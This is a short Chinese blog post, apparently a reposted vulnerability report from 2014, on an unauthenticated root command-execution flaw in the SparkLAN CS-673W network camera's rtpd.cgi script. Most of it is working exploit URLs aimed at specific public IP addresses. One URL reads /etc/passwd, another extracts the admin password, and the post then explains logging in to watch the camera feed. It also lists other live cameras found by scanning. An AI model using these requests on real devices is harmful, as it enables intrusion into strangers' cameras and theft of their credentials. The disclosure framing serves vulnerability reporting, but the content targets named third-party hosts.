天气

SparkLAN网络摄像头CS-673W命令执行漏洞


 SparkLAN,台湾公司。


参考CVE-2013-1599,原漏洞主要涉及D-Link,本漏洞中的CS-673W同样中招,

该摄像头产品中/var/www/cgi-bin/rtpd.cgi可在未验证情况下接受攻击者的恶意请求,以root身份执行任意命令。

 

1.查看/etc/passwd

http://183.179.253.135/cgi-bin/rtpd.cgi?cat&/etc/passwd



2.获取摄像头密码

http://183.179.253.135/cgi-bin/rtpd.cgi?echo&AdminPasswd_ss|tdb&get&HTTPAccount



3.远程监控

拿到密码后,以用户名admin登陆http://183.179.253.135/
 

cam.png





4.如何证明这是通用?(漏洞特殊,请在漏洞确认后请删除该部分内容)

小范围扫描,可得:

http://59.149.83.240/

http://14.198.20.207/



……

标签:
分类:学习交流| 发布:admin| 查看: | 发表时间:2014/10/2
原创文章如转载,请注明:转载自个人资讯网 http://www.zhangxinran.com/
本文链接:http://www.zhangxinran.com/post/1068.html

相关文章

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Design By zhangxinran.com | Login | Power By zhangxinran.com | 皖公网安备:34010402701072号